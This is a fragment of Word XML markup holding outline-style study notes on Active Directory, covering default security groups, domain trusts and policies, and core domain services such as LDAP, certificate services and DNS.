    <w:p w14:paraId="43F8CC39" w14:textId="10AB2AE2" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default Security Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198C8A4" w14:textId="62C4AB48" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Controllers – all domain controllers in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBDAE6" w14:textId="0B6837D4" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Guests – all domain guests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38327750" w14:textId="740AC699" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Users – all domain users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C71E17A" w14:textId="71D7736D" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Computers – all workstations and servers joined to the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71740618" w14:textId="1F72CA5C" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Admins – designated admins of the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA0125" w14:textId="18F330A0" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enterprise Admins – designated admins of the enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D3474" w14:textId="19C4AD67" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Schema Admin – designated admins of the schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D105A" w14:textId="1D1AFE4C" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DNS Admins – DNS admins group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A6D6C" w14:textId="02B731E2" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DNS Update Proxy – DNS clients who are permitted to perform dynamic updates on behalf of some other clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901659F" w14:textId="0400737D" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allowed RODC Password Replication Group – passwords can be replicated to all read-only domain controllers in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B3656" w14:textId="6495AE78" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Protected Users – afforded additional protections against authentication security threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D532D86" w14:textId="1EED3FA2" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cert Publishers – permitted to publish certificates to directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAEF9E1" w14:textId="467B0C20" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Read-Only Domain Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798CF3E6" w14:textId="40B9298D" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enterprise Read-Only Domain Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7BD32D" w14:textId="3D7376F3" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Key Admins – perform admin actions on key objects within domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A719F4" w14:textId="69EF6B2E" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enterprise Key Admins – admin actions on key objects within forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFA3B2" w14:textId="74420F67" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cloneable Domain Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2555DD27" w14:textId="30EFA986" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RAS and IAS Servers – can access remote access properties of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75474BF3" w14:textId="009A2154" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Trusts and Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316AC7B5" w14:textId="3A7D9BF9" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Help domain and trees communicate with each other and maintain security inside of the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD572EC" w14:textId="4ED4BD3A" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Put rules in place of how the domains inside of a forest can interact with each other, how an external forest can interact with the forest, and the overall domain rules or policies that a domain must follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C29B8" w14:textId="5D53D41A" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Trusts Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FCBF9C" w14:textId="4D09DB86" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mechanism in place for users in the network to gain access to other resources in domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E378B89" w14:textId="3736A818" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Outline way domains inside forest communicate to each other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB79E2" w14:textId="5F1DEB2C" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Two Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D3EEF2" w14:textId="246B8CB8" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Directional – direction of the trust flows from a trusting domain to a trusted domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D022444" w14:textId="72890666" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Transitive – the trust relationship expands beyond just two domains to include other trusted domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206A7DE" w14:textId="77777777" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Type of trust in place determines how the domains and trees in a forest </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>are able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> communicate and send data to and from each other </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC769A0" w14:textId="639F8841" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When attacking an AD environment can abuse trusts to move laterally throughout network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B0FB5" w14:textId="109F05E0" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Policies Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB12656" w14:textId="21E46BC1" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dictate how server operates and what rules it will and will not follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53068029" w14:textId="57BC9268" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> groups except they contain rules instead of permissions and apply to whole domain versus specific group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78498BF9" w14:textId="38B8945F" w:rsidR="001B64B2" w:rsidRPr="0084205E" w:rsidRDefault="001B64B2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rule Book for AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20E179" w14:textId="31FC679C" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Modifiable by domain admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FACB4" w14:textId="26A05007" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Options for domain policies are almost endless and are a big factor for attackers when enumerating an AD network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2AF687" w14:textId="33609D09" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active Directory Domain Services and Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C753BAA" w14:textId="2F634D6E" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Core functions of AD network, allow for domain management, security certificates, LDAPs, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E534D" w14:textId="6D0ED308" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain controller decides what it wants to do and what services it wants to provide for the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2DCA7" w14:textId="1692BBAC" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Services Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16367DDE" w14:textId="24E0EE95" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Services provided to rest of domain or tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D7F7A" w14:textId="06B405BE" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default domain services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434CF269" w14:textId="0DA2AF60" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>LDAP – Lightweight Directory Access Protocol – provides communication between applications and directory services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EA8C1" w14:textId="28124F1F" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Certificate Services – allows the domain controller to create, validate, and revoke public key certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61721673" w14:textId="0A464B8B" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>DNS,LLMNR</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, NBT-NS – Domain Name Services for ID-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> IP hostnames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CCC10D" w14:textId="7C08DA1C" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Authentication Overview</w:t>
      </w:r>
    </w:p>
